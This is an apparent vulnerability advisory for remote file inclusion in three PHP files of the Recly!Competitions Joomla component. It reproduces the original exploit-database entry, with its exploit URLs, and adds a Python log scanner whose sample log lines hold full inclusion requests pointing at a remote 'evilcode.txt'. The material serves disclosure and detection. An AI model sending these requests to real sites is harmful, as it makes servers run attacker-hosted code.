Vendor: com_competitions
By: NoGe
CVSS: 7.5 (HIGH)
Vulnerability type: Multiple Remote File Inclusion
Product Name: com_competitions
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO

Recly!Competitions Component 1.0.0 Multiple Remote File Inclusion Vulnerability

The Recly!Competitions Component version 1.0.0 is vulnerable to multiple remote file inclusion in its add.php, competitions.php, and settings.php files. Each file builds the path it hands to require_once from the mosConfig_absolute_path global (read through $GLOBALS in add.php and competitions.php, and as a bare variable in settings.php) without validating it. When PHP's register_globals is enabled, a request can set that global through the query string, so an attacker can point the include at a remote file and have its contents executed as PHP.

Mitigation:

The vendor has not provided any mitigation or remediation for this vulnerability.
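As an added example (not part of the advisory, and not code from the Recly!Competitions component), the following Python script scans web-server access log lines in Common Log Format for requests that try to set the include base path through the query string, in both forms the exploit URLs on this page use: the bare mosConfig_absolute_path key and the GLOBALS[mosConfig_absolute_path] array form. The application never expects that variable from the client, so any such request is worth an alert; the script also reports whether the supplied value is a URL that require_once would fetch. The log lines, IP addresses and the evilcode.txt file name are constructed for this example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Query-string keys taken from the advisory's exploit URLs: the bare global used by
# settings.php and the $GLOBALS array form used by add.php and competitions.php.
WATCHED_KEYS = frozenset({
    "mosConfig_absolute_path",
    "GLOBALS[mosConfig_absolute_path]",
})

# A value with one of these schemes would make require_once fetch code over the network.
REMOTE_SCHEME = re.compile(r"^(?:https?|ftps?)://", re.IGNORECASE)

# Common Log Format (assumed for the constructed sample below):
# host ident user [time] "METHOD target PROTOCOL" status bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    # RFI attempt against add.php using the $GLOBALS form
    '203.0.113.7 - - [07/Nov/2008:10:15:02 +0000] "GET /joomla/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://198.51.100.9/evilcode.txt? HTTP/1.1" 200 512',
    # same attempt against competitions.php, percent-encoded so a plain grep for "GLOBALS[" misses it
    '203.0.113.7 - - [07/Nov/2008:10:15:04 +0000] "GET /joomla/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS%5BmosConfig_absolute_path%5D=http%3A%2F%2F198.51.100.9%2Fevilcode.txt%3F HTTP/1.1" 200 498',
    # bare-global form against settings.php, value is a local path rather than a URL
    '198.51.100.23 - - [07/Nov/2008:11:02:40 +0000] "GET /joomla/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=/tmp/x HTTP/1.1" 500 0',
    # ordinary component request, must not be flagged
    '192.0.2.10 - - [07/Nov/2008:11:05:13 +0000] "GET /joomla/index.php?option=com_competitions&task=view&id=3 HTTP/1.1" 200 8120',
    # malformed line, must be skipped rather than crash the scan
    'not a log line',
]


def include_path_params(target):
    """Return [(key, value)] for every watched key in the request target's query string.

    parse_qsl percent-decodes keys as well as values, so the encoded form
    GLOBALS%5BmosConfig_absolute_path%5D is matched just like the literal one.
    """
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if k in WATCHED_KEYS]


def classify_value(value):
    """'remote' if the value is a URL require_once could fetch, otherwise 'other'."""
    return "remote" if REMOTE_SCHEME.match(value) else "other"


def scan_access_log(lines):
    """Return one finding per attempt to set the include base path from the client."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in Common Log Format; ignore
        for key, value in include_path_params(m["target"]):
            findings.append({
                "src": m["src"],
                "time": m["ts"],
                "script": urlsplit(m["target"]).path,
                "param": key,
                "value": value,
                "kind": classify_value(value),
                "status": int(m["status"]),
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['src']} {f['kind']:6} {f['script']} "
              f"{f['param']}={f['value']} (HTTP {f['status']})")
```

The decoding step is the point: matching on the decoded key and value catches the percent-encoded request that a literal string search would miss, and the HTTP status is kept because a 200 on an include of a remote URL is a stronger signal than a 500. The log check complements rather than replaces configuration-level fixes: with register_globals turned off the client cannot set the variable at all, and with allow_url_include turned off require_once will not fetch a remote URL.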

Exploit-DB raw data:

=============================================================================================================================================================


  [o] Recly!Competitions Component 1.0.0 Multiple Remote File Inclusion Vulnerability

       Software : com_competitions version 1.0.0
       Vendor   : http://www.recly.com/
       Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=12
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


=============================================================================================================================================================


  [o] Vulnerable file

       administrator/components/com_competitions/includes/competitions/add.php

        require_once($GLOBALS['mosConfig_absolute_path'] . '/components/com_competitions/lib/common/GlobalVariables.class.php');

       administrator/components/com_competitions/includes/competitions/competitions.php

        require_once( $GLOBALS['mosConfig_absolute_path'] . '/administrator/includes/pageNavigation.php' );

       administrator/components/com_competitions/includes/settings/settings.php

        require_once($mosConfig_absolute_path.'/components/com_competitions/lib/common/String.class.php');



  [o] Exploit

       http://localhost/[path]/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
       http://localhost/[path]/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
       http://localhost/[path]/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=[evilcode]


=============================================================================================================================================================


  [o] Greetz

       MainHack BrotherHood [ http://serverisdown.org/blog/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11  martfella
       skulmatic olibekas ulga Cungkee k1tk4t str0ke

        
=============================================================================================================================================================

# milw0rm.com [2008-11-07]